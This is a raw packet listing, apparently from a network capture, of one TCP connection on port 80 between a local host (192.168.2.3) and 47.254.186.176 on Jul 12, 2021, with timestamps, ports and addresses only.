Jul 12, 2021 10:28:46.499514103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499521971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499541998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499566078 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499576092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499608040 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499646902 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499788046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499815941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499845028 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499852896 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499881029 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499888897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499902964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499923944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499947071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499957085 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499979019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500003099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500010967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500035048 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500046968 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500070095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500081062 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500107050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500117064 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500142097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500157118 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500175953 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500201941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500207901 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500231981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500238895 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500262022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500268936 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500291109 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500298023 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500322104 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500338078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500349045 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500369072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500402927 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500437021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500444889 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500485897 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500710011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500739098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500763893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500776052 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500803947 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500816107 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500844955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500864029 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500889063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500902891 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500927925 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500956059 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.500966072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.500992060 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501018047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501027107 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.501055002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501061916 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.501091957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501099110 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.501117945 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.501130104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501147032 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.501164913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501179934 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.501199007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501209021 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.501230001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501240969 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.501261950 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501277924 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.501293898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501306057 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.501327038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501339912 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.501358986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501374006 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.501401901 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.501487017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501542091 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.501916885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501940966 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501961946 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.501975060 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502015114 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502041101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502063036 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502089024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502094984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502123117 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502129078 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502147913 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502166986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502177954 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502199888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502228022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502233982 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502253056 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502269983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502279043 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502302885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502312899 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502343893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502351999 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502379894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502389908 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502420902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502428055 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502454996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502465010 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502491951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502501965 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502526045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502535105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502559900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502571106 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502598047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502607107 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502634048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502646923 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502670050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502679110 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502701998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502715111 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502733946 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502757072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502779007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502801895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.502808094 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502813101 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502827883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502835035 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.502887011 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503036022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503101110 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503150940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503180981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503206968 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503225088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503248930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503259897 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503281116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503302097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503324032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503336906 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503357887 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503371000 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503391027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503407001 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503423929 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503447056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503468990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503480911 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503485918 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503513098 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503525972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503537893 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503557920 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503577948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503587961 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503611088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503638029 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503644943 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503659964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503678083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503700018 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503711939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503725052 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503760099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503799915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503823042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503853083 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503875017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503889084 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503909111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503923893 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.503941059 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503984928 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.503992081 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504018068 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504029989 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504051924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504080057 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504108906 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504388094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504412889 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504435062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504446983 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504472971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504491091 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504549026 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504589081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504628897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504638910 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504666090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504673958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504697084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504720926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504731894 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504755974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504765987 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504791021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504801035 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504827976 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504837036 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504858971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504868031 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504890919 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504899979 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504928112 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504936934 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504961014 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.504973888 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.504992962 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505003929 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505027056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505036116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505057096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505069017 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505089998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505099058 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505136013 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505184889 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505208969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505229950 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505247116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505260944 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505284071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505295038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505319118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505333900 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505352974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505381107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505387068 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505410910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505433083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505441904 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505469084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505475998 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505500078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505513906 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505532026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505553961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505568027 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505598068 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505609035 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505631924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505650043 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505661964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505681992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505691051 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505711079 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505723953 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505739927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505764008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.505769968 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.505814075 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506130934 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506186962 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506212950 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506263971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506346941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506386042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506396055 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506419897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506428957 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506462097 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506484032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506508112 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506527901 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506540060 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506561041 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506571054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506591082 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506603003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506614923 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506633043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506645918 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506669998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506680012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506704092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506715059 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506738901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506747961 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506772995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506781101 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506805897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506814957 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506839991 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506849051 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506872892 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506881952 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506908894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506920099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506947041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506956100 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.506979942 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.506989956 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507010937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507019997 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507040024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507052898 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507070065 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507080078 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507110119 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507157087 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507181883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507204056 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507213116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507236004 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507241964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507262945 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507292986 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507520914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507541895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507576942 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507606030 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507639885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507661104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507684946 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507690907 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507714033 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507724047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507741928 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507760048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507771969 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.507795095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.507802963 CEST	49720	80	192.168.2.3	47.254.186.176
